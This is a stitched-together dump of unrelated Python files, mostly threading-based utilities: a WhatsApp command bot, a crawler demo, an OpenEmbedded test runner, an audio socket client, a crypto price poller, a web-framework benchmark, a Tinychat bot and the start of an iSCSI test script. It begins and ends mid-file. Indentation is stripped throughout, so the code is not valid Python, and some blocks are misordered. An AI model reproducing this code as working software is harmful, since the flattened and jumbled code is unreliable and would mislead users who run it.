[os.path.expanduser('~/Code/anser-indicus/'), 'numpy', 'pymystem3', 'tables', 'pyparsing',
'scipy', 'sklearn']) # , other_args="-t {}".format(target_dir))
fooenv.run_in_env('../tests/helloworld.py')
|
Triggerwithcommandcenter.py
|
from WhatsappTrigger import whatsapp, WhatsappBot  # import the required main modules
from whatsappCommandExcutor.CommandExcutor import WpReciverCommand  # this module receives messages (commands) from WhatsApp
from whatsappCommandExcutor.hook import CommandHook  # this module hooks a WhatsApp message to a function
from cprint import *  # this module is only used for printing colorful debug information
from os import getcwd  # getcwd returns the current working directory
import threading
from time import sleep  # sleep is used to pause the program
def Startcommandreciver(driv):
reciver = WpReciverCommand()
setHook = CommandHook()
while True:
setHook.Hook(reciver.getmsg(driv))
sleep(1)
def FireUpthreads(driv):
reciverThread = threading.Thread(target=Startcommandreciver,args=(driv,))
reciverThread.setDaemon(True)  # run as a daemon thread so it exits together with the main thread
reciverThread.setName("reciverThread")
reciverThread.start()  # start the thread
try:
app = WhatsappBot.WhatsappSendMsg(getcwd() + "/webdriver/chromedriver")  # WhatsappSendMsg sets up everything needed to send WhatsApp messages; it requires the chromedriver path
driv = app.find_user("tesing")  # find_user locates the user, opens their chat and returns a Chrome driver
wapp = whatsapp.Trigger(app, driv)  # the Trigger object sends messages using the WhatsappSendMsg object and the driver returned by find_user
FireUpthreads(driv)  # start the thread responsible for receiving messages in parallel
while True:
wapp.send_msg(input("#Enter your message => "))  # send_msg sends the message
cprint.info("DONE") # print success message
except KeyboardInterrupt:
app.quit(driv)  # quit the app if the user presses Ctrl+C
print("")
cprint.info("Goodbye")
|
multi_thread.py
|
import requests
import time
from threading import Thread
urls = [
f'https://www.cnblogs.com/#p{page}'
for page in range(1, 51)
]
def craw(url):
response = requests.get(url).text
# single-threaded
def single_thread(urls):
start = time.time()
print('single-threaded: start')
for url in urls:
craw(url)
print('single-threaded: done')
end = time.time()
print(f'took {end - start} seconds')
# multithreaded
# Two ways to create threads: 1. subclass Thread and override run()  2. create a Thread directly with target=
# One difference between Python 3.x and Python 2.x: Python 3 can simply use super().xxx instead of super(Class, self).xxx
# When overriding run() you must call super().__init__() so the parent class's __init__() runs,
# giving inherit_thread instances all the attributes defined by Thread.__init__()
class inherit_thread(Thread):
def __init__(self, url):
super().__init__()
self.url = url
def run(self):
craw(self.url)
if __name__ == '__main__':
# single-threaded
single_thread(urls)
print('--------------------------------------------------------------------------------------')
# multithreaded, approach 1 (Thread subclass)
print('multithreaded: start')
start = time.time()
thread_list = []
for url in urls:
thread = inherit_thread(url)
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
end = time.time()
print('multithreaded: done')
print(f'took {end - start}s in total')
print('--------------------------------------------------------------------------------------')
# multithreaded, approach 2 (Thread with target=)
thread_list = []
print('multithreaded: start')
start = time.time()
for url in urls:
thread = Thread(target=craw, args=(url,))
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
end = time.time()
print('multithreaded: done')
print(f'took {end - start}s in total')
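print('--------------------------------------------------------------------------------------')
# Multithreaded, approach 3 (thread pool) -- an illustrative addition, not part of the original
# script: concurrent.futures.ThreadPoolExecutor creates and joins the worker threads for us.
from concurrent.futures import ThreadPoolExecutor
print('thread pool: start')
start = time.time()
with ThreadPoolExecutor(max_workers=10) as executor:
    executor.map(craw, urls)
end = time.time()
print('thread pool: done')
print(f'took {end - start}s in total')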
|
commands.py
|
# Copyright (c) 2013-2014 Intel Corporation
#
# Released under the MIT license (see COPYING.MIT)
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convenient way for tests.
import os
import sys
import signal
import subprocess
import threading
import logging
from oeqa.utils import CommandError
from oeqa.utils import ftools
import re
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, basestring):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
self.output = None
self.error = None
self.thread = None
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def commThread():
self.output, self.error = self.process.communicate(self.data)
self.thread = threading.Thread(target=commThread)
self.thread.start()
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
self.thread.join(self.timeout)
self.stop()
def stop(self):
if self.thread.isAlive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
self.thread.join(5)
if self.thread.isAlive():
self.process.kill()
self.thread.join()
self.output = self.output.rstrip()
self.status = self.process.poll()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, assert_error=True, **options):
result = Result()
cmd = Command(command, timeout=timeout, **options)
cmd.run()
result.command = command
result.status = cmd.status
result.output = cmd.output
result.pid = cmd.process.pid
if result.status and not ignore_status:
if assert_error:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, result.output))
else:
raise CommandError(result.status, command, result.output)
return result
def bitbake(command, ignore_status=False, timeout=None, postconfig=None, **options):
if postconfig:
postconfig_file = os.path.join(os.environ.get('BUILDDIR'), 'oeqa-post.conf')
ftools.write_file(postconfig_file, postconfig)
extra_args = "-R %s" % postconfig_file
else:
extra_args = ""
if isinstance(command, basestring):
cmd = "bitbake " + extra_args + " " + command
else:
cmd = [ "bitbake" ] + [a for a in (command + extra_args.split(" ")) if a not in [""]]
try:
return runCmd(cmd, ignore_status, timeout, **options)
finally:
if postconfig:
os.remove(postconfig_file)
def get_bb_env(target=None, postconfig=None):
if target:
return bitbake("-e %s" % target, postconfig=postconfig).output
else:
return bitbake("-e", postconfig=postconfig).output
def get_bb_var(var, target=None, postconfig=None):
val = None
bbenv = get_bb_env(target, postconfig=postconfig)
lastline = None
for line in bbenv.splitlines():
if re.search("^(export )?%s=" % var, line):
val = line.split('=')[1]
val = val.strip('\"')
break
elif re.match("unset %s$" % var, line):
# Handle [unexport] variables
if lastline.startswith('# "'):
val = lastline.split('\"')[1]
break
lastline = line
return val
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if '~' in l:
l = os.path.expanduser(l)
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
def create_temp_layer(templayerdir, templayername, priority=999, recipepathspec='recipes-*/*'):
os.makedirs(os.path.join(templayerdir, 'conf'))
with open(os.path.join(templayerdir, 'conf', 'layer.conf'), 'w') as f:
f.write('BBPATH .= ":${LAYERDIR}"\n')
f.write('BBFILES += "${LAYERDIR}/%s/*.bb \\' % recipepathspec)
f.write(' ${LAYERDIR}/%s/*.bbappend"\n' % recipepathspec)
f.write('BBFILE_COLLECTIONS += "%s"\n' % templayername)
f.write('BBFILE_PATTERN_%s = "^${LAYERDIR}/"\n' % templayername)
f.write('BBFILE_PRIORITY_%s = "%d"\n' % (templayername, priority))
f.write('BBFILE_PATTERN_IGNORE_EMPTY_%s = "1"\n' % templayername)
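# Usage sketch (illustrative only; the command strings and variable values are examples,
# not part of this module):
#
#   result = runCmd('bitbake-layers show-layers')
#   print(result.status, result.output)
#
#   # run bitbake with an extra post-config fragment appended via -R:
#   bitbake('core-image-minimal', postconfig='IMAGE_FSTYPES = "ext4"')
#
#   # query a single variable from the bitbake environment:
#   machine = get_bb_var('MACHINE')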
|
AudioServerStream.py
|
import errno
import threading
from six.moves import queue
import socket
import time
# Audio recording parameters
RATE = 44100
CHUNK = 1600
class AudioServerStream(object):
"""Opens a recording stream as a generator yielding the audio chunks."""
def __init__(self, rate=RATE, chunk=CHUNK, server_name='127.0.0.1',
port=4444):
self._rate = rate
self._chunk = chunk
self._server_name = server_name
self._port = port
# Socket for connection
self.s = None
self._connected = False
# Audio data thread to get data from server
self.data_thread = threading.Thread(target=self._get_server_data)
self.data_thread.daemon = True
# Create a thread-safe buffer of audio data
self._buff = queue.Queue()
self.closed = True
def _connect(self):
"""Creates a socket to listen for audio data from the server."""
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self._server_name, self._port))
self._connected = True
def _get_server_data(self):
"""Daemon thread that receives data from the audio socket and puts in a
buffer. Works just like _get_audio_data but data comes from server,
not mic.
"""
try:
while True:
data = self.s.recv(self._chunk)
self._buff.put(data)
except KeyboardInterrupt as e:
    print("AUDIO_SERVER: Shutdown from thread: {}".format(e))
    self.__exit__(None, None, None)
def __enter__(self):
"""Makes 3 attempts at connecting to the audio server defined in the
parameters file.
"""
print("AUDIO_SERVER: Using audio server.")
# Retry 3 times to connect
MAX_CONNECTION_RETRY = 3
for _ in range(0, MAX_CONNECTION_RETRY):
try:
self._connect()
except socket.error as e:
print("AUDIO_SERVER: Socket exception caught!\n{}\n"
"Retrying...".format(e))
time.sleep(1)
continue
break
# Yay :)
if self._connected:
print("AUDIO_SERVER: Connected to audio server.")
self.data_thread.start()
self.closed = False
return self
# Nay :c
else:
raise IOError(errno.ECONNREFUSED,
              "AUDIO_SERVER: Unable to connect to audio server! Make sure "
              "it is running and you are connected on the same network.")
def __exit__(self, type, value, traceback):
    # Close the socket first so the receive thread unblocks, then join it.
    self.s.shutdown(socket.SHUT_RDWR)
    self.s.close()
    self.data_thread.join()
    self.closed = True
# Signal the generator to terminate so that the client's
# streaming_recognize method will not block the process termination.
self._buff.put(None)
def generator(self):
while not self.closed:
# Use a blocking get() to ensure there's at least one chunk of
# data, and stop iteration if the chunk is None, indicating the
# end of the audio stream.
chunk = self._buff.get()
if chunk is None:
return
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
chunk = self._buff.get(block=False)
if chunk is None:
return
data.append(chunk)
except queue.Empty:
break
yield b''.join(data)
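# Usage sketch (illustrative; the server address and the consumer function are assumptions,
# not part of this module):
#
#   with AudioServerStream(rate=RATE, chunk=CHUNK, server_name='127.0.0.1', port=4444) as stream:
#       for audio_chunk in stream.generator():
#           consume(audio_chunk)  # e.g. feed chunks to a streaming speech-recognition request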
|
coin_database.py
|
# Copyright (c) 2021, coincell
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import requests
import threading
import json
import re
from exceptions import *
from utils import CoinPrice
class CoinMetadata:
def __init__(self, code, name, price, rank, volume_24h, market_cap, available_supply,
total_supply, max_supply, change_1h, change_24h, change_7d):
self.code = code
self.name = name
self.price = price
self.rank = rank
self.volume_24h = volume_24h
self.market_cap = market_cap
self.available_supply = available_supply
self.total_supply = total_supply
self.max_supply = max_supply
self.change_1h = change_1h
self.change_24h = change_24h
self.change_7d = change_7d
class CoinDatabase:
API_URL = 'https://api.coinmarketcap.com/v1/ticker/?convert={0}'
WEB_URL = 'https://coinmarketcap.com/all/views/all/'
VALID_FIAT_CURRENCIES = set([
'aud', 'brl', 'cad', 'chf', 'clp', 'cny', 'czk', 'dkk', 'eur', 'gbp', 'hkd', 'huf', 'idr',
'ils', 'inr', 'jpy', 'krw', 'mxn', 'myr', 'nok', 'nzd', 'php', 'pkr', 'pln', 'rub', 'sek',
'sgd', 'thb', 'try', 'twd', 'zar', 'usd'
])
def __init__(self, fiat_currency):
self.fiat_currency = fiat_currency.lower()
if self.fiat_currency not in CoinDatabase.VALID_FIAT_CURRENCIES:
raise ConfigException('Unknown fiat currency "{0}"'.format(fiat_currency))
self._running = True
self._metadata = {}
self._metadata_condition = threading.Condition()
self._stop_condition = threading.Condition()
self._api_url = CoinDatabase.API_URL.format(self.fiat_currency.upper())
self._web_url = CoinDatabase.WEB_URL
self._update_thread = threading.Thread(target=self.poll_data)
self._update_thread.start()
def stop(self):
self._running = False
with self._stop_condition:
self._stop_condition.notify()
self._update_thread.join()
def wait_for_data(self):
with self._metadata_condition:
if len(self._metadata) == 0:
self._metadata_condition.wait()
def get_currency_price(self, code):
if self.has_coin(code):
price = self.get_currency_metadata(code).price
return CoinPrice(code, price, self.fiat_currency)
else:
return CoinPrice(code)
def get_currency_metadata(self, code):
with self._metadata_condition:
if code in self._metadata:
return self._metadata[code]
else:
raise UnknownCurrencyException(code)
def has_coin(self, code):
with self._metadata_condition:
return code in self._metadata
def get_top_coins(self, top_limit):
coins = []
with self._metadata_condition:
for coin in self._metadata.values():
if coin.rank is not None and coin.rank <= top_limit:
coins.append(coin)
return sorted(coins, key=lambda i: i.rank)
def get_coins(self):
with self._metadata_condition:
return self._metadata.values()
def _extract_float(self, value):
return None if value is None else float(value)
def _merge_attribute(self, lhs, rhs, attribute):
if getattr(rhs, attribute) is not None:
setattr(lhs, attribute, getattr(rhs, attribute))
def _add_coin(self, code, coin):
if code in self._metadata:
stored_coin = self._metadata[code]
self._merge_attribute(stored_coin, coin, "name")
self._merge_attribute(stored_coin, coin, "price")
self._merge_attribute(stored_coin, coin, "rank")
self._merge_attribute(stored_coin, coin, "volume_24h")
self._merge_attribute(stored_coin, coin, "market_cap")
self._merge_attribute(stored_coin, coin, "available_supply")
self._merge_attribute(stored_coin, coin, "total_supply")
self._merge_attribute(stored_coin, coin, "max_supply")
self._merge_attribute(stored_coin, coin, "change_1h")
self._merge_attribute(stored_coin, coin, "change_24h")
self._merge_attribute(stored_coin, coin, "change_7d")
else:
self._metadata[code] = coin
def _load_from_api(self):
result = None
try:
raw_result = requests.get(self._api_url)
result = json.loads(raw_result.text)
except Exception as ex:
# TODO: somehow log this
pass
if result is not None:
with self._metadata_condition:
for entry in result:
try:
coin = CoinMetadata(
entry['symbol'],
entry['name'],
self._extract_float(entry['price_' + self.fiat_currency]),
int(entry['rank']),
self._extract_float(entry['24h_volume_' + self.fiat_currency]),
self._extract_float(entry['market_cap_' + self.fiat_currency]),
self._extract_float(entry['available_supply']),
self._extract_float(entry['total_supply']),
self._extract_float(entry['max_supply']),
self._extract_float(entry['percent_change_1h']),
self._extract_float(entry['percent_change_24h']),
self._extract_float(entry['percent_change_7d'])
)
self._add_coin(entry['symbol'], coin)
except Exception as ex:
if 'symbol' in entry:
print 'Failed to parse metadata for "{0}": {1}'.format(
entry['symbol'],
ex
)
else:
print 'Failed to parse currency metadata: {0}'.format(ex)
self._metadata_condition.notify_all()
def _load_from_web(self):
if self.fiat_currency == 'usd':
conversion_rate = 1.0
else:
data = requests.get(self._api_url).text
data = json.loads(data)
# Find the conversion rate between USD and whatever fiat currency we're using
for coin in data:
if coin['symbol'] == 'BTC':
conversion_rate = float(coin['price_' + self.fiat_currency]) / float(coin['price_usd'])
data = requests.get(self._web_url).text
table_start = data.find('id="currencies-all"')
table_end = data.find('</table>', table_start)
table = data[table_start:table_end]
attribute_keys = {
'class="text-center">' : 'rank',
'currency-name-container' : 'name',
'col-symbol' : 'code',
'market-cap' : 'market-cap',
'class="price"' : 'price',
'circulating-supply' : 'circulating-supply',
'class="volume"' : 'volume',
'data-timespan="1h"' : 'change-1h',
'data-timespan="24h"' : 'change-24h',
'data-timespan="7d"' : 'change-7d',
}
price_attributes = ['price', 'market-cap', 'volume']
number_attributes = price_attributes + ['circulating-supply']
percentage_attributes = ['change-1h', 'change-24h', 'change-7d']
with self._metadata_condition:
for entry in table.split('<tr ')[1:]:
attributes = {}
for column in entry.split('<td '):
for key, value in attribute_keys.items():
if key in column:
index = column.find(key)
match = re.findall('>([^<]+)<', column[index:], re.MULTILINE)
match = map(lambda i: i.strip(), match)
match = filter(lambda i: len(i) > 0, match)
if len(match) > 0:
attributes[value] = match[0].strip()
else:
attributes[value] = None
for key in number_attributes:
if attributes.get(key, None):
try:
attributes[key] = float(attributes[key].replace('$', '').replace(',', ''))
except:
attributes[key] = None
for key in price_attributes:
if attributes.get(key, None):
attributes[key] *= conversion_rate
for key in percentage_attributes:
if attributes.get(key, None):
attributes[key] = float(attributes[key].replace('%', ''))
try:
coin = CoinMetadata(
attributes['code'],
attributes['name'],
attributes['price'],
int(attributes['rank']),
attributes['volume'],
attributes['market-cap'],
attributes['circulating-supply'],
None,
None,
attributes.get('change-1h', None),
attributes.get('change-24h', None),
attributes.get('change-7d', None)
)
self._add_coin(attributes['code'], coin)
except Exception as ex:
pass
def poll_data(self):
while self._running:
# Load all coins by parsing coinmarketcap.com/all/views/all/
try:
self._load_from_web()
except:
pass
# Now get some better data for the coins that are served through the API
self._load_from_api()
with self._stop_condition:
# Sleep for 5 minutes
self._stop_condition.wait(60 * 5)
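# Usage sketch (illustrative; 'usd' and 'BTC' are example values and live data is required):
#
#   db = CoinDatabase('usd')    # starts the background polling thread
#   db.wait_for_data()          # block until the first metadata batch arrives
#   print db.get_currency_metadata('BTC').price
#   for coin in db.get_top_coins(10):
#       print coin.rank, coin.code
#   db.stop()                   # stop the polling thread before exiting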
|
async.py
|
import argparse
import asyncio
import collections
import cProfile
import gc
import random
import socket
from statistics import stdev, mean, median
import string
import sys
from multiprocessing import Process, set_start_method, Barrier
import aiohttp
def find_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
host, port = s.getsockname()
s.close()
return host, port
profiler = cProfile.Profile()
def run_aiohttp(host, port, barrier, profile):
from aiohttp import web
@asyncio.coroutine
def test(request):
txt = 'Hello, ' + request.match_info['name']
return web.Response(text=txt)
@asyncio.coroutine
def prepare(request):
gc.collect()
return web.Response(text='OK')
@asyncio.coroutine
def stop(request):
loop.call_later(0.1, loop.stop)
return web.Response(text='OK')
@asyncio.coroutine
def init(loop):
app = web.Application(loop=loop)
app.router.add_route('GET', '/prepare', prepare)
app.router.add_route('GET', '/stop', stop)
app.router.add_route('GET', '/test/{name}', test)
handler = app.make_handler(keep_alive=15, timeout=None)
srv = yield from loop.create_server(handler, host, port)
return srv, app, handler
loop = asyncio.get_event_loop()
srv, app, handler = loop.run_until_complete(init(loop))
barrier.wait()
if profile:
profiler.enable()
loop.run_forever()
srv.close()
loop.run_until_complete(handler.finish_connections())
loop.run_until_complete(srv.wait_closed())
loop.close()
if profile:
profiler.disable()
def run_tornado(host, port, barrier, profile):
import tornado.ioloop
import tornado.web
class TestHandler(tornado.web.RequestHandler):
def get(self, name):
txt = 'Hello, ' + name
self.set_header('Content-Type', 'text/plain; charset=utf-8')
self.write(txt)
class PrepareHandler(tornado.web.RequestHandler):
def get(self):
gc.collect()
self.write('OK')
class StopHandler(tornado.web.RequestHandler):
def get(self):
self.write('OK')
def on_finish(self):
tornado.ioloop.IOLoop.instance().stop()
app = tornado.web.Application([
(r'/prepare', PrepareHandler),
(r'/stop', StopHandler),
(r'/test/(.+)', TestHandler)])
app.listen(port, host)
barrier.wait()
tornado.ioloop.IOLoop.instance().start()
def run_twisted(host, port, barrier, profile):
if 'bsd' in sys.platform or sys.platform.startswith('darwin'):
from twisted.internet import kqreactor
kqreactor.install()
elif sys.platform in ['win32']:
from twisted.internet.iocpreactor import reactor as iocpreactor
iocpreactor.install()
elif sys.platform.startswith('linux'):
from twisted.internet import epollreactor
epollreactor.install()
else:
from twisted.internet import default as defaultreactor
defaultreactor.install()
from twisted.web.server import Site
from twisted.web.resource import Resource
from twisted.internet import reactor
class TestResource(Resource):
def __init__(self, name):
super().__init__()
self.name = name
self.isLeaf = name is not None
def render_GET(self, request):
txt = 'Hello, ' + self.name
request.setHeader(b'Content-Type', b'text/plain; charset=utf-8')
return txt.encode('utf8')
def getChild(self, name, request):
return TestResource(name=name.decode('utf-8'))
class PrepareResource(Resource):
isLeaf = True
def render_GET(self, request):
gc.collect()
return b'OK'
class StopResource(Resource):
isLeaf = True
def render_GET(self, request):
reactor.callLater(0.1, reactor.stop)
return b'OK'
root = Resource()
root.putChild(b'test', TestResource(None))
root.putChild(b'prepare', PrepareResource())
root.putChild(b'stop', StopResource())
site = Site(root)
reactor.listenTCP(port, site, interface=host)
barrier.wait()
reactor.run()
@asyncio.coroutine
def attack(count, concurrency, client, loop, url):
out_times = collections.deque()
processed_count = 0
def gen():
for i in range(count):
rnd = ''.join(random.sample(string.ascii_letters, 16))
yield rnd
@asyncio.coroutine
def do_bomb(in_iter):
nonlocal processed_count
for rnd in in_iter:
real_url = url + '/test/' + rnd
try:
t1 = loop.time()
resp = yield from client.get(real_url)
assert resp.status == 200, resp.status
if 'text/plain; charset=utf-8' != resp.headers['Content-Type']:
raise AssertionError('Invalid Content-Type: %r' %
resp.headers)
body = yield from resp.text()
yield from resp.release()
assert body == ('Hello, ' + rnd), rnd
t2 = loop.time()
out_times.append(t2 - t1)
processed_count += 1
except Exception:
continue
in_iter = gen()
bombers = []
for i in range(concurrency):
bomber = asyncio.async(do_bomb(in_iter))
bombers.append(bomber)
t1 = loop.time()
yield from asyncio.gather(*bombers)
t2 = loop.time()
rps = processed_count / (t2 - t1)
return rps, out_times
@asyncio.coroutine
def run(test, count, concurrency, *, loop, verbose, profile):
if verbose:
print("Prepare")
else:
print('.', end='', flush=True)
host, port = find_port()
barrier = Barrier(2)
server = Process(target=test, args=(host, port, barrier, profile))
server.start()
barrier.wait()
url = 'http://{}:{}'.format(host, port)
connector = aiohttp.TCPConnector(loop=loop)
with aiohttp.ClientSession(connector=connector) as client:
for i in range(10):
# make server hot
resp = yield from client.get(url+'/prepare')
assert resp.status == 200, resp.status
yield from resp.release()
if verbose:
test_name = test.__name__
print("Attack", test_name)
rps, data = yield from attack(count, concurrency, client, loop, url)
if verbose:
print("Done")
resp = yield from client.get(url+'/stop')
assert resp.status == 200, resp.status
yield from resp.release()
server.join()
return rps, data
def main(argv):
args = ARGS.parse_args()
count = args.count
concurrency = args.concurrency
verbose = args.verbose
tries = args.tries
loop = asyncio.get_event_loop()
suite = [run_aiohttp, run_tornado, run_twisted]
suite *= tries
random.shuffle(suite)
all_times = collections.defaultdict(list)
all_rps = collections.defaultdict(list)
for test in suite:
test_name = test.__name__
rps, times = loop.run_until_complete(run(test, count, concurrency,
loop=loop, verbose=verbose,
profile=args.profile))
all_times[test_name].extend(times)
all_rps[test_name].append(rps)
if args.profile:
profiler.dump_stats('out.prof')
print()
for test_name in sorted(all_rps):
rps = all_rps[test_name]
times = [t * 1000 for t in all_times[test_name]]
rps_mean = mean(rps)
times_mean = mean(times)
times_stdev = stdev(times)
times_median = median(times)
print('Results for', test_name)
print('RPS: {:d},\tmean: {:.3f} ms,'
'\tstandard deviation {:.3f} ms\tmedian {:.3f} ms'
.format(int(rps_mean),
times_mean,
times_stdev,
times_median))
return 0
ARGS = argparse.ArgumentParser(description="Run benchmark.")
ARGS.add_argument(
'-t', '--tries', action="store",
nargs='?', type=int, default=5,
help='count of tries (default: `%(default)s`)')
ARGS.add_argument(
'-n', '--count', action="store",
nargs='?', type=int, default=10000,
help='requests count (default: `%(default)s`)')
ARGS.add_argument(
'-c', '--concurrency', action="store",
nargs='?', type=int, default=500,
help='count of parallel requests (default: `%(default)s`)')
ARGS.add_argument(
'-p', '--plot-file-name', action="store",
type=str, default=None,
dest='plot_file_name',
help='file name for plot (default: `%(default)s`)')
ARGS.add_argument(
'-v', '--verbose', action="count", default=0,
help='verbosity level (default: `%(default)s`)')
ARGS.add_argument(
'--profile', action="store_true", default=False,
help='perform aiohttp test profiling, store result as out.prof '
'(default: `%(default)s`)')
if __name__ == '__main__':
set_start_method('spawn')
sys.exit(main(sys.argv))
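# Illustrative invocations (the numbers are examples only):
#   python async.py                         # defaults: 5 tries, 10000 requests, concurrency 500
#   python async.py -n 50000 -c 1000 -t 3
#   python async.py --profile               # additionally dumps the aiohttp profile to out.prof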
|
bot.py
|
import logging
import time
import getpass
import tinybot
log = logging.getLogger(__name__)
def main():
room_name = raw_input('Enter room name: ').strip()
if tinybot.pinylib.CONFIG.ACCOUNT and tinybot.pinylib.CONFIG.PASSWORD:
bot = tinybot.TinychatBot(roomname=room_name, account=tinybot.pinylib.CONFIG.ACCOUNT,
password=tinybot.pinylib.CONFIG.PASSWORD)
else:
bot = tinybot.TinychatBot(roomname=room_name)
bot.nickname = raw_input('Enter nickname: (optional) ').strip()
do_login = raw_input('Login? [enter=No] ')
if do_login:
if not bot.account:
bot.account = raw_input('Account: ').strip()
if not bot.password:
bot.password = getpass.getpass('Password: ')
is_logged_in = bot.login()
while not is_logged_in:
bot.account = raw_input('Account: ').strip()
bot.password = getpass.getpass('Password: ')
if bot.account == '/' or bot.password == '/':
main()
break
elif bot.account == '//' or bot.password == '//':
do_login = False
break
else:
is_logged_in = bot.login()
if is_logged_in:
bot.console_write(tinybot.pinylib.COLOR['bright_green'], 'Logged in as: %s' % bot.account)
if not do_login:
bot.account = ''
bot.password = None
status = bot.set_rtmp_parameters()
while True:
if status == 1:
bot.console_write(tinybot.pinylib.COLOR['bright_red'], 'Password protected. Enter room password')
bot.room_pass = raw_input()
if bot.room_pass == '/':
main()
break
else:
status = bot.set_rtmp_parameters()
elif status == 2:
bot.console_write(tinybot.pinylib.COLOR['bright_red'], 'The room has been closed.')
main()
break
elif status == 4:
bot.console_write(tinybot.pinylib.COLOR['bright_red'], 'The response returned nothing.')
main()
break
else:
bot.console_write(tinybot.pinylib.COLOR['bright_green'], 'Connect parameters set. Connecting')
break
t = tinybot.threading.Thread(target=bot.connect)
t.daemon = True
t.start()
while not bot.is_connected:
time.sleep(2)
while bot.is_connected:
chat_msg = raw_input()
if chat_msg.startswith('/'):
msg_parts = chat_msg.split(' ')
cmd = msg_parts[0].lower().strip()
if cmd == '/q':
bot.disconnect()
if bot.is_green_connected:
bot.disconnect(greenroom=True)
elif cmd == '/a':
if len(bot.users.signed_in) == 0:
print ('No signed in users in the room.')
else:
for user in bot.users.signed_in:
print ('%s:%s' % (user.nick, user.account))
elif cmd == '/u':
for user in bot.users.all:
print ('%s: %s' % (user, bot.users.all[user].user_level))
elif cmd == '/m':
if len(bot.users.mods) == 0:
print ('No moderators in the room.')
else:
for mod in bot.users.mods:
print (mod.nick)
elif cmd == '/l':
if len(bot.users.lurkers) == 0:
print ('No lurkers in the room.')
else:
for lurker in bot.users.lurkers:
print (lurker.nick)
elif cmd == '/n':
if len(bot.users.norms) == 0:
print ('No normal users in the room.')
else:
for norm in bot.users.norms:
print (norm.nick)
elif cmd == '/b':
if len(msg_parts) == 2:
_user = bot.users.search(msg_parts[1])
if _user is not None:
if _user.user_level <= 1:
print ('Cannot ban room owner or client.')
else:
bot.send_ban_msg(_user.nick, _user.id)
else:
print ('No user named: %s' % msg_parts[1])
elif cmd == '/k':
if len(msg_parts) == 2:
_user = bot.users.search(msg_parts[1])
if _user is not None:
if _user.user_level <= 1:
print ('Cannot kick room owner or client.')
else:
bot.send_ban_msg(_user.nick, _user.id)
bot.send_forgive_msg(_user.id)
else:
print ('No user named: %s' % msg_parts[1])
else:
bot.send_chat_msg(chat_msg)
if __name__ == '__main__':
if tinybot.pinylib.CONFIG.DEBUG_TO_FILE:
        formatter = '%(asctime)s : %(levelname)s : %(filename)s : %(lineno)d : %(funcName)s() : %(name)s : %(message)s'
        logging.basicConfig(filename=tinybot.pinylib.CONFIG.B_DEBUG_FILE_NAME,
                            level=tinybot.pinylib.CONFIG.DEBUG_LEVEL, format=formatter)
log.info('Starting tinybot version: %s using pinylib version: %s' %
(tinybot.__version__, tinybot.pinylib.__version__))
else:
log.addHandler(logging.NullHandler())
main()
|
Chap10_Example10.3.py
|
from threading import *
def my_msgprint():
print("The above line is executed by: ", current_thread().getName())
print("Main Thread creating child object")
mthread = Thread(target = my_msgprint, name = 'MyChildThread')
print("Main Thread starting child thread")
mthread.start()
|
calsoft.py
|
import os
import time
import sys
import subprocess
import threading
import json
CALSOFT_BIN_PATH = "/usr/local/calsoft/iscsi-pcts-v1.5/bin"
'''
11/26/2015 disable tc_login_11_2 and tc_login_11_4
RFC 7143 6.3
Neither the initiator nor the target should attempt to declare or
negotiate a parameter more than once during login, except for
responses to specific keys that explicitly allow repeated key
declarations (e.g., TargetAddress)
The spec didn't make it clear what other keys could be re-declared.
Discussed this with UNH and reached the conclusion that TargetName/
TargetAddress/MaxRecvDataSegmentLength could be re-declared.
'''
'''
12/1/2015 add tc_login_2_2 to known_failed_cases
RFC 7143 6.1
A standard-label MUST begin with a capital letter and must not exceed
